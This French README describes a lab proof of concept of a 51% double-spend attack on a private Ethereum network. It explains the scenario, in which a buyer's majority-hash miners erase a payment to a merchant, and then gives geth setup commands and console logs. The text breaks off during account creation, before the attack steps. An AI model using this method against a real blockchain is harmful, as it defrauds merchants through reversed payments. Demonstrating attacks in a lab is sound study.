# Attaque de 51% sur une Blockchain Ethereum

[English Version](README.md)

## Introduction

<div style="text-align: justify">
Ce repository permet de mettre en avant et d'expliquer plusieurs concepts autour de la blockchain. Il a pour but de présenter techniquement la réalisation d'une attaque à 51% sur une blockchain privée. La technologie utilisée dans notre cas sera Ethereum.
</div>

## Présentation de la blockchain

<div style="text-align: justify">
Pour présenter rapidement la blockchain, ou chaîne de blocs en français, c'est une solution technique qui permet de stocker des données, au même titre qu'une base de données. Elle comporte cependant des spécificités, elle est décentralisée et distribuée. C'est à dire qu'aucun des noeuds ne peut contrôler ou modifier les informations envoyées dans cette dernière. L'ensemble des données sont partagées et répliquées sur chacun des noeuds. Les données envoyées par les noeuds sont vérifiées et validées par la blockchain. L'ensemble de ces données permet de former une chaîne de blocs. Les données ainsi que les mises à jour des noeuds se fait via du P2P.
<div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="309" src="img/blockchain-schema-transaction.jpg">
</td></tr></table>

<div style="text-align: justify">
Elle se veut donc, infalsifiable par défaut. Il faut voir ça comme un énorme registre qui comporte l'ensemble des transactions. Tout le monde peut consulter l'ensemble des transactions, mais personne ne peut les modifier.

Ces systèmes sont aujourd'hui mis en avant, notamment avec l'explosion des monnaies virtuelles. Cela ne reflète pas la véritable utilisation qu'il est possible de faire d'une blockchain, l'ensemble des aspects présentés régulièrement sont purement spéculatifs, comme pour le bitcoin par exemple.

L'utilisation d'une blockchain permet de répondre à des besoins spécifiques. Il ne faut pas l'utiliser en simple remplacement d'une base de données classique, si votre base de données permet de répondre à vos besoins sans problème, c'est que vous n'avez pas besoin d'utiliser une blockchain.

Dans toutes les blockchain il existe des "mineurs", ces mineurs sont là pour créer des blocs. Pour créer un bloc il faut installer un logiciel et ce dernier se chargera d'utiliser les ressources de votre ordinateur pour résoudre des calculs mathématiques compliqués, à chaque fois que le calcul est résolu vous créer des blocs. Ils servent de "carburant" dans la blockchain, car pour chaque transaction vous devrez reverser une petite partie. Par exemple avec la blockchain la plus connue, miner permet de créer des bitcoins. Et lorsque vous voulez payer ou être payé, la personne qui sera à l'initiative de la transaction va payer des frais. Il est indispensable de détenir ce carburant pour échanger sur la blockchain. Un autre exemple avec la blockchain Ethereum, pour chaque bloc miné, 3 ETH sont reversés.

Pour miner, plusieurs configurations sont possibles, il est possible de rajouter ses machines à la blockchain et de miner normalement, mais il faut avoir une grosse puissance de calcul pour avoir des résultats sur le court termes. Il est aussi possible de rejoindre un "pool", c'est à dire un ensemble de personne mettant à disposition leur puissance de calcul pour miner un bloc. Lorsque le bloc est miné, les ETH/BTC gagnés sont donc redistribués aux mineurs selon la puissance de calcul qu'ils ont fournis.

L'ensemble des blockchain sont utilisés et construites autour de la cryptographie. Elles utilisent pour la plupart des algorithmes spécifiques à leur chaîne, comme ETHash pour Ethereum. Des algorithmes asymétriques sont également utilisés, comme les courbes elliptiques et la courbe secp256k1 pour le Bitcoin. La sécurité et l'inviolabilité de la blockchain est assurée par l'utilisation de ces protocoles.
</div>

Illustration de la blockchain :
<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="435" src="img/blockchain-transaction.jpg">
</td></tr></table>

## Ethereum

<div style="text-align: justify">
Ethereum est une blockchain connue sous le symbole "ETH", c'est une des plus connues avec le Bitcoin (BTC). Cette blockchain sera utilisée pour notre PoC. Pour des raisons de faisabilités évidentes nous utiliserons une blockchain privée et pas la blockchain publique d'Ethereum.

Ethereum permet grâce à un système de contrat intelligent (SmartContract) de réaliser des contrats entre les différents parties de la blockchain, c'est une fonctionnalité très intéressante et révolutionnaire pour certains milieux comme les assurances par exemple. La particularité d'Ethereum réside dans ce système de contrat, cela permet à cette technologie d'être largement utilisée pour différents projets, que ça soit sur la blockchain publique ou des projets privés.
</div>

## Les limites

<div style="text-align: justify">
Comme toutes les technologies, les différentes blockchain ont des limites, notamment celle que nous allons essayer d'exploiter aujourd'hui. Elle intervient au niveau de la puissance de calcul, le réseau de la blockchain est décentralisé, il est basé sur des noeuds X et Y tenu par une communauté.

Une des limites est donc que si une personne ou un groupe de personne arrive à détenir plus de 50% de la puissance de calcul, il sera en mesure de contrôler la blockchain, et donc d'altérer son fonctionnement et de remettre en cause tout son fonctionnement.

Une des autres limites peut intervenir au niveau des protocoles eux mêmes, si une vulnérabilité est détectée, que ça soit sur le protocole de minage ou sur l'implémentation de la blockchain, tout le système est compromis. Une solution à ce genre de problème est de créer un "fork" de la blockchain en appliquant les corrections. Ce cas a été observé avec la séparation de l'Ethereum "ETH" et de l'Ethereum Classic "ETC".
</div>

## Présentation du contexte

<div style="text-align: justify">
Comme déjà indiqué le but de cette page est de présenter une attaque de type 51% sur une blockchain privée Ethereum.

Pour contextualiser cette attaque nous allons prendre le cas d'une société mettant en vente des produits sur son site Internet. Cet achat doit se régler via l'utilisation d'une blockchain privée basée sur Ethereum.

La personne qui réalise l'achat est donc en mesure d'ajouter des noeuds sur cette blockchain et donc de réaliser cette attaque.
</div>

## L'attaque

<div style="text-align: justify">
L'attaque permettra donc d'avoir une plus grosse puissance de calcul que l'ensemble des noeuds de la blockchain, et donc d'en altérer les données et le fonctionnement.

L'attaquant va tout d'abord ajouter des noeuds sur la blockchain du site vendeur. L'ajout de ces noeuds va permettre de récupérer la blockchain et de se synchroniser avec les autres machines de la blockchain.

L'attaquant doit disposer d'une puissance plus importante que celle utilisée actuellement sur la blockchain. Pour y arriver, je vous laisse imaginer les scénarios possibles (hack des machines de la blockchain, utilisation d'instance cloud EC2, etc.).

Une fois que la puissance de calcul est en possession de l'attaquant, il va déconnecter ses machines du réseau de la société, mais il va continuer à miner des blocs avec ses machines. C'est à ce moment qu'il réalisera un achat sur le site. Une fois la transaction réalisée, il reconnectera ses machines au réseau.

Cela aura pour effet d'écraser la transaction qui vient d'être réalisée. Cela est dû au fait que l'attaquant dispose d'une puissance de calcul de plus de 50% sur la blockchain. Il a donc pu de son côté miner avec plus de puissance que le reste de la blockchain. En reconnectant ses machines au réseau, une validation est effectuée pour connaître la chaîne à suivre, et vu que celle de l'attaquant est plus avancée, elle sera automatiquement sélectionnée par la blockchain et répliquée sur chaque noeud.

La transaction entre l'attaquant et le site vendeur est donc annulée.
</div>

## Présentation de la plateforme pour le PoC

<div style="text-align: justify">
Pour réaliser un test d'attaque à 51% sur la blockchain Ethereum nous avons fait le choix d'utiliser Debian 10. L'ISO que nous avons utilisé est disponible dans /utils/iso. Les paquets ainsi que les binaires des applications sont disponibles dans /utils/bin.

La plateforme est composée de 2 machines :
- 2 machines attaquantes
- 1 machine "honnête" qui représente la blockchain de l'entreprise vendeuse

Le nombre de machine est évolutif, nous en utilisons deux pour ne pas que ça soit trop lourd pour la réalisation du PoC.

Les spécifications sont les suivantes :
- Machine attaquante : 4vCPU, 4Go RAM, 50Go HDD
- Machine de l'entreprise : 4vCPU, 4Go RAM, 50Go HDD
</div>

<table align="center"><tr><td align="center" width="9999">
  <img width="690" height="390" src="img/blockchain-example.png">
</td></tr></table>

## Les outils utilisés

<div style="text-align: justify">
Pour la réalisation de cette attaque nous allons utiliser les outils basiques pour créer et manipuler une blockchain Ethereum.

- L'OS Debian en version 10.3.0 65bits Netinst (ISO disponible dans utlis/iso)
- GO Ethereum (GETH) en version 1.9.12 (paquet disponible dans utils/bin)

Toutes les versions de GETH sont disponibles sur le site officiel : https://geth.ethereum.org/downloads/

Toutes les versions de Debian sont disponibles sur le site officiel : http://ftp.nl.debian.org/debian/dists/

Geth permet d'installer le moteur de la blockchain ethereum ainsi que le client Javascript du même nom.
</div>

## Table des matières

| Paramètre Geth          | Signification                                                                                                                                        |
| ----------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------- |
| attach                  | Démarrer un environnement JavaScript interactif (se connecter au nœud)                                                                               |
| console                 | Démarrer un environnement JavaScript interactif                                                                                                      |
| init                    | Bootstrap et initialisation d'un nouveau bloc de genèse                                                                                              |
| --allow-insecure-unlock | Permettre le déverrouillage des comptes non sécurisés lorsque les CPD liés aux comptes sont exposés par http                                         |
| --bootnodes value       | URL d'encodage séparées par des virgules pour le bootstrap de la découverte P2P (utiliser plutôt v4+v5 pour les serveurs légers)                     |
| --cache value           | Mégaoctets de mémoire alloués à la mise en cache interne (par défaut = 4096 nœud complet du réseau principal, 128 en mode léger) (par défaut : 1024) |
| --datadir value         | Répertoire de données pour les bases de données et le keystore (par défaut : "/root/.ethereum")                                                      |
| --identity              | Nom de nœud personnalisé                                                                                                                             |
| --ipcpath value         | Nom de fichier pour la prise/le tuyau IPC dans le datadir (les chemins explicites y échappent)                                                       |
| --lightkdf              | Réduire l'utilisation de la mémoire vive et de l'unité centrale au détriment de la puissance du KDF                                                  |
| --maxpeers value        | Nombre maximum de pairs du réseau (réseau désactivé si défini à 0) (par défaut : 50)                                                                 |
| --mine                  | Permettre le minage                                                                                                                                  |
| --miner.threads value   | Nombre de threads CPU à utiliser pour l'exploitation minière (par défaut : 0)                                                                        |
| --networkid value       | Identificateur du réseau (nombre entier, 1=Frontière, 2=Morden (désaffecté), 3=Ropsten, 4=Rinkeby) (par défaut : 1)                                  |
| --nodiscover            | Désactive le mécanisme de découverte des pairs (ajout manuel des pairs)                                                                              |
| --nousb                 | Désactive la surveillance et la gestion des portefeuilles de matériel USB                                                                            |
| --port value            | Port d'écoute du réseau (par défaut : 30303)                                                                                                         |
| --rpc                   | Activer le serveur HTTP-RPC                                                                                                                          |
| --rpccorsdomain value   | Liste séparée par des virgules des domaines à partir desquels il est possible d'accepter des demandes d'origine croisée (navigateur appliqué)        |
| --rpcport value         | Port d'écoute du serveur HTTP-RPC (par défaut : 8545)                                                                                                |

## Hôtes et Architecture des dossiers

```
root# uname -a
Linux node-2 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
root# cat /etc/debian_version
10.3
```

- node-1 : 4vCPUs et 4GB de RAM - IP : 192.168.0.17 (honestMiner)
- node-2 : 4vCPUs et 4GB de RAM - IP : 192.168.0.34 (maliciousMiner)
- node-3 : 4vCPUs et 4GB de RAM - IP : 192.168.0.35 (maliciousPerson)

```
honestMiner
	data
maliciousMiner
	data
maliciousPerson
	data
network
	genesis.json
```

## Conditions préalables

{- Sur chaque hôte -}

### Avec une connexion Internet

```
root# apt install gnupg1 -y
root# echo "deb http://ppa.launchpad.net/ethereum/ethereum/ubuntu bionic main " | tee /etc/apt/sources.list.d/ethereum.list
root# apt-key adv --keyserver keyserver.ubuntu.com  --recv-keys 2A518C819BE37D2C2031944D1C52189C923F6CA9
root# apt update
root# apt install ethereum git -y
root# geth version
Geth
Version: 1.9.11-stable
Git Commit: 6a62fe399b68ab9e3625ef5e7900394f389adc3a
Architecture: amd64
Protocol Versions: [65 64 63]
Go Version: go1.13.8
Operating System: linux
GOPATH=
GOROOT=/build/ethereum-2t6lYR/.go
root# git clone https://gitlab.com/adrienpavone/blockchain_51.git
root# cd blockchain_51
```

### Sans connexion Internet

```
root# cd blockchain_51/utils/bin
root# dpkg -i *
root# cd ../../
```

## But

Le but du projet est d'envoyer *1000000000000000000* ethereum privé au site marchant qui a pour adresse publique *0xe82e809d5f9574b54a4b8ead7e195b163b39662f*, puis de briser la séquence de la chaîne avec l'attaque de 51%.

### Initialisation du noeud du projet

#### Initialisation du réseau Ethereum

{- Sur l'hôte honestMiner -}

`geth --nousb --datadir honestMiner/data  init network/genesis.json`
```shell                                       
INFO [03-08|13:14:28.162] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:14:28.162] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:14:28.163] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/chaindata cache=16.00MiB handles=16
INFO [03-08|13:14:28.418] Writing custom genesis block
INFO [03-08|13:14:28.419] Persisted trie from memory database      nodes=1 size=149.00B time=95.9µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:14:28.419] Successfully wrote genesis state         database=chaindata hash=2d326d…48d0a3
INFO [03-08|13:14:28.419] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/lightchaindata cache=16.00MiB handles=16
INFO [03-08|13:14:28.635] Writing custom genesis block
INFO [03-08|13:14:28.636] Persisted trie from memory database      nodes=1 size=149.00B time=90.983µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:14:28.636] Successfully wrote genesis state         database=lightchaindata hash=2d326d…48d0a3
```

#### Création du mineur honestMiner

Lorsque vous accédez à la console avec la commande suivante, vous devez exécuter ``personal.newAccount()`` afin de créer le compte honestMiner, puis ``admin.nodeInfo.enode`` afin d'obtenir les informations de l'enode, enfin, la commande ``personal`` pour obtenir toutes les informations personnelles du mineur.

{- Sur l'hôte honestMiner -}

`geth --nousb --networkid 15 --port 60303 --rpc --lightkdf --cache 16 --datadir honestMiner/data console`
```shell
INFO [03-08|13:14:40.616] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:14:40.617] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:14:40.617] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:14:40.617] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:14:40.617] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:14:41.066] Opened ancient database                  database=/root/blockchain_51/honestMiner/data/geth/chaindata/ancient
INFO [03-08|13:14:41.067] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:14:41.067] Disk storage enabled for ethash caches   dir=/root/blockchain_51/honestMiner/data/geth/ethash count=3
INFO [03-08|13:14:41.067] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:14:41.067] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=<nil>
WARN [03-08|13:14:41.067] Upgrade blockchain database version      from=<nil> to=7
INFO [03-08|13:14:41.068] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:14:41.068] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:14:41.068] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:14:41.068] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:14:41.069] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:14:41.073] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=1.869ms
INFO [03-08|13:14:41.144] New local node record                    seq=1 id=8ae30acc5217cc82 ip=127.0.0.1 udp=60303 tcp=60303
INFO [03-08|13:14:41.146] IPC endpoint opened                      url=/root/blockchain_51/honestMiner/data/geth.ipc
INFO [03-08|13:14:41.147] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors= vhosts=localhost
INFO [03-08|13:14:41.152] Started P2P networking                   self=enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@127.0.0.1:60303
WARN [03-08|13:14:41.222] Served eth_coinbase                      reqid=3 t=26.137µs err="etherbase must be explicitly specified"
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
at block: 0 (Thu Jan 01 1970 01:00:00 GMT+0100 (CET))
 datadir: /root/blockchain_51/honestMiner/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> INFO [03-08|13:14:42.495] New local node record                    seq=2 id=8ae30acc5217cc82 ip=109.15.242.225 udp=29208 tcp=60303
> personal.newAccount()
Passphrase:
Repeat passphrase:
INFO [03-08|13:14:51.729] Looking for peers                        peercount=0 tried=77 static=0
INFO [03-08|13:14:51.927] Your new key was generated               address=0x3c5f76F70fE977FA25722CC6D1ec84909639224D
WARN [03-08|13:14:51.927] Please backup your key file!             path=/root/blockchain_51/honestMiner/data/keystore/UTC--2020-03-08T12-14-51.681696153Z--3c5f76f70fe977fa25722cc6d1ec84909639224d
WARN [03-08|13:14:51.927] Please remember your password!
"0x3c5f76f70fe977fa25722cc6d1ec84909639224d"
> personal
{
  listAccounts: ["0x3c5f76f70fe977fa25722cc6d1ec84909639224d"],
  listWallets: [{
      accounts: [{...}],
      status: "Locked",
      url: "keystore:///root/blockchain_51/honestMiner/data/keystore/UTC--2020-03-08T12-14-51.681696153Z--3c5f76f70fe977fa25722cc6d1ec84909639224d"
  }],
  deriveAccount: function(),
  ecRecover: function(),
  getListAccounts: function(callback),
  getListWallets: function(callback),
  importRawKey: function(),
  initializeWallet: function(),
  lockAccount: function(),
  newAccount: function(),
  openWallet: function(),
  sendTransaction: function(),
  sign: function(),
  signTransaction: function(),
  unlockAccount: function(),
  unpair: function()
}
> admin.nodeInfo.enode
"enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@109.15.242.225:60303?discport=29208"
> exit
INFO [03-08|13:15:01.234] HTTP endpoint closed                     url=http://127.0.0.1:8545
INFO [03-08|13:15:01.234] IPC endpoint closed                      url=/root/blockchain_51/honestMiner/data/geth.ipc
INFO [03-08|13:15:01.234] Blockchain manager stopped
INFO [03-08|13:15:01.234] Stopping Ethereum protocol
INFO [03-08|13:15:01.234] Ethereum protocol stopped
INFO [03-08|13:15:01.234] Transaction pool stopped
INFO [03-08|13:15:01.735] Looking for peers                        peercount=1 tried=81 static=0  
```

#### Début du minage avec un faible CPU

{- Sur l'hôte honestMiner -}

`geth --nousb --identity nodeAPAVONE --nodiscover --networkid 15 --port 60303 --maxpeers 10 --lightkdf --cache 16  --rpc --rpccorsdomain "*" --datadir honestMiner/data --miner.threads 1 --mine
`
```shell
INFO [03-08|13:15:15.209] Maximum peer count                       ETH=10 LES=0 total=10
INFO [03-08|13:15:15.209] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:15:15.209] Starting peer-to-peer node               instance=Geth/nodeAPAVONE/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:15:15.209] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:15:15.210] Allocated cache and file handles         database=/root/blockchain_51/honestMiner/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:15:15.576] Opened ancient database                  database=/root/blockchain_51/honestMiner/data/geth/chaindata/ancient
INFO [03-08|13:15:15.576] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:15:15.576] Disk storage enabled for ethash caches   dir=/root/blockchain_51/honestMiner/data/geth/ethash count=3
INFO [03-08|13:15:15.576] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:15:15.577] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:15:15.578] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:15:15.578] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:15:15.578] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:15:15.578] Loaded local transaction journal         transactions=0 dropped=0
INFO [03-08|13:15:15.579] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:15:15.579] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:15:15.581] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=980.756µs
INFO [03-08|13:15:15.729] New local node record                    seq=3 id=8ae30acc5217cc82 ip=127.0.0.1 udp=0 tcp=60303
INFO [03-08|13:15:15.729] Started P2P networking                   self="enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@127.0.0.1:60303?discport=0"
INFO [03-08|13:15:15.730] IPC endpoint opened                      url=/root/blockchain_51/honestMiner/data/geth.ipc
INFO [03-08|13:15:15.731] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors=* vhosts=localhost
INFO [03-08|13:15:15.731] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:15:15.731] Updated mining threads                   threads=1
INFO [03-08|13:15:15.731] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:15:15.731] Etherbase automatically configured       address=0x3c5f76F70fE977FA25722CC6D1ec84909639224D
INFO [03-08|13:15:15.731] Commit new mining work                   number=1 sealhash=869fa6…678564 uncles=0 txs=0 gas=0 fees=0 elapsed=196.883µs
INFO [03-08|13:15:16.269] Successfully sealed new block            number=1 sealhash=869fa6…678564 hash=9fd433…919790 elapsed=537.640ms
INFO [03-08|13:15:16.269] 🔨 mined potential block                  number=1 hash=9fd433…919790
INFO [03-08|13:15:16.269] Commit new mining work                   number=2 sealhash=436627…d25d22 uncles=0 txs=0 gas=0 fees=0 elapsed=168.842µs
INFO [03-08|13:15:17.332] Successfully sealed new block            number=2 sealhash=436627…d25d22 hash=db2ac9…704a42 elapsed=1.062s
INFO [03-08|13:15:17.332] 🔨 mined potential block                  number=2 hash=db2ac9…704a42
INFO [03-08|13:15:17.332] Commit new mining work                   number=3 sealhash=5f0bed…ebc5b4 uncles=0 txs=0 gas=0 fees=0 elapsed=394.287µs
INFO [03-08|13:15:19.195] Successfully sealed new block            number=3 sealhash=5f0bed…ebc5b4 hash=f641b8…8c5c58 elapsed=1.862s
INFO [03-08|13:15:19.195] 🔨 mined potential block                  number=3 hash=f641b8…8c5c58
INFO [03-08|13:15:19.195] Commit new mining work                   number=4 sealhash=54d41b…a5541b uncles=0 txs=0 gas=0 fees=0 elapsed=374.654µs
INFO [03-08|13:15:22.031] Successfully sealed new block            number=4 sealhash=54d41b…a5541b hash=c157a3…d71b22 elapsed=2.836s
INFO [03-08|13:15:22.031] 🔨 mined potential block                  number=4 hash=c157a3…d71b22
INFO [03-08|13:15:22.032] Commit new mining work                   number=5 sealhash=7ba808…5ff6a5 uncles=0 txs=0 gas=0 fees=0 elapsed=525.802µs
```

Pour ce défi, vous devrez donner à l'attaquant l'adresse de l'enode afin de vous synchroniser avec le mineur honestMiner : *"enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303"*

Et le fichier *genesis.json* dans le dossier network afin d'obtenir l'adresse coinbase et toutes les informations associées.

### L'attaque !

Pour attaquer, l'attaquant a besoin de deux comptes, un compte maliciousMiner et un compte maliciousPerson. Il devra créer un compte pour les deux, ainsi qu'initialiser le réseau.

#### Initialisation du réseau

{- Sur l'hôte maliciousMiner -}

`geth --nousb --datadir maliciousMiner/data  init network/genesis.json`
```shell
INFO [03-08|13:21:34.244] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:21:34.244] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:21:34.244] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=16.00MiB handles=16
INFO [03-08|13:21:34.319] Writing custom genesis block
INFO [03-08|13:21:34.320] Persisted trie from memory database      nodes=1 size=149.00B time=107.646µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:34.320] Successfully wrote genesis state         database=chaindata hash=2d326d…48d0a3
INFO [03-08|13:21:34.320] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/lightchaindata cache=16.00MiB handles=16
INFO [03-08|13:21:34.419] Writing custom genesis block
INFO [03-08|13:21:34.420] Persisted trie from memory database      nodes=1 size=149.00B time=335.782µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:34.420] Successfully wrote genesis state         database=lightchaindata hash=2d326d…48d0a3
```
{- Sur l'hôte maliciousPerson -}

`geth --nousb --datadir maliciousPerson/data  init network/genesis.json`
```shell
INFO [03-08|13:21:39.721] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:21:39.721] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:21:39.721] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/chaindata cache=16.00MiB handles=16
INFO [03-08|13:21:40.010] Writing custom genesis block
INFO [03-08|13:21:40.011] Persisted trie from memory database      nodes=1 size=149.00B time=88.67µs gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:40.011] Successfully wrote genesis state         database=chaindata hash=2d326d…48d0a3
INFO [03-08|13:21:40.011] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/lightchaindata cache=16.00MiB handles=16
INFO [03-08|13:21:40.109] Writing custom genesis block
INFO [03-08|13:21:40.110] Persisted trie from memory database      nodes=1 size=149.00B time=1.502934ms gcnodes=0 gcsize=0.00B gctime=0s livenodes=1 livesize=0.00B
INFO [03-08|13:21:40.111] Successfully wrote genesis state         database=lightchaindata hash=2d326d…48d0a3
```

#### Création des comptes

##### maliciousMiner

- account : *maliciousMiner*
- password : *maliciousminer*

Lorsque vous accédez à la console avec la commande suivante, vous devez exécuter ``personal.newAccount()`` afin de créer le compte honestMiner, puis ``admin.nodeInfo.enode`` afin d'obtenir les informations de l'enode, enfin, la commande ``personal`` pour obtenir toutes les informations personnelles du mineur.

{- Sur l'hôte maliciousMiner -}

`geth --nousb --networkid 15 --port 60303 --rpc --rpcport 8545 --lightkdf --cache 16 --datadir maliciousMiner/data console`
```shell
INFO [03-08|13:24:42.499] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:24:42.499] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:24:42.499] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:24:42.499] Allocated trie memory caches             clean=4.00MiB dirty=4.00MiB
INFO [03-08|13:24:42.500] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=16.00MiB handles=524288
INFO [03-08|13:24:42.837] Opened ancient database                  database=/root/blockchain_51/maliciousMiner/data/geth/chaindata/ancient
INFO [03-08|13:24:42.837] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:24:42.837] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousMiner/data/geth/ethash count=3
INFO [03-08|13:24:42.837] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:24:42.837] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=<nil>
WARN [03-08|13:24:42.837] Upgrade blockchain database version      from=<nil> to=7
INFO [03-08|13:24:42.838] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:24:42.839] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:24:42.839] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:24:42.839] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:24:42.840] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:24:42.843] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=2.229ms
INFO [03-08|13:24:42.964] New local node record                    seq=1 id=358c5618374a8627 ip=127.0.0.1 udp=60303 tcp=60303
INFO [03-08|13:24:42.964] Started P2P networking                   self=enode://92d5d085f7c834762dd190095508d470f8dc001975e6d7a8689fb6b69ba1f749bdff8e2be1a1d948b78c850e7bfe017cbb31d998161e6112f608b7435d7d6ef0@127.0.0.1:60303
INFO [03-08|13:24:42.966] IPC endpoint opened                      url=/root/blockchain_51/maliciousMiner/data/geth.ipc
INFO [03-08|13:24:42.966] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors= vhosts=localhost
WARN [03-08|13:24:43.042] Served eth_coinbase                      reqid=3 t=72.588µs err="etherbase must be explicitly specified"
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
at block: 0 (Thu Jan 01 1970 01:00:00 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousMiner/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> perINFO [03-08|13:24:44.940] New local node record                    seq=2 id=358c5618374a8627 ip=109.15.242.225 udp=60303 tcp=60303
> personal.newAccount()
Passphrase:
Repeat passphrase:

